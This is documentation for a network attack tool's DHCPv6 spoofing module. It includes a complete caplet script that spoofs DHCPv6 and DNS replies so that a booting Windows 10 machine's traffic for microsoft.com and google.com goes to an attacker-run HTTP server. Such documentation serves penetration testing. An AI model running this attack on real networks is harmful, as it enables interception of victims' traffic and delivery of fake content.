dhcp6.spoof

This module’s purpose is attacking Microsoft Windows hosts by replying to DHCPv6 messages and providing the target with a link-local IPv6 address and setting the attacker host as default DNS server (as described here).

This module must be used together with dns.spoof module in order to be effective.

Commands

dhcp6.spoof on

Start the DHCPv6 spoofer in the background.

dhcp6.spoof off

Stop the DHCPv6 spoofer in the background.

Parameters

parameterdefaultdescription
dhcp6.spoof.domainsmicrosoft.com, goole.com, facebook.com, apple.com, twitter.comComma separated values of domain names to spoof.

Examples

The following is the mitm6.cap caplet performing the full DHCPv6 attack versus a Windows 10 machine which is booting:

  1. # let's spoof Microsoft and Google ^_^
  2. set dns.spoof.domains microsoft.com, google.com
  3. set dhcp6.spoof.domains microsoft.com, google.com
  4. # every http request to the spoofed hosts will come to us
  5. # let's give em some contents
  6. set http.server.path /var/www/something
  7. # serve files
  8. http.server on
  9. # redirect DNS request by spoofing DHCPv6 packets
  10. dhcp6.spoof on
  11. # send spoofed DNS replies ^_^
  12. dns.spoof on
  13. # set a custom prompt for ipv6
  14. set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold {reset}
  15. # clear the events buffer and the screen
  16. events.clear
  17. clear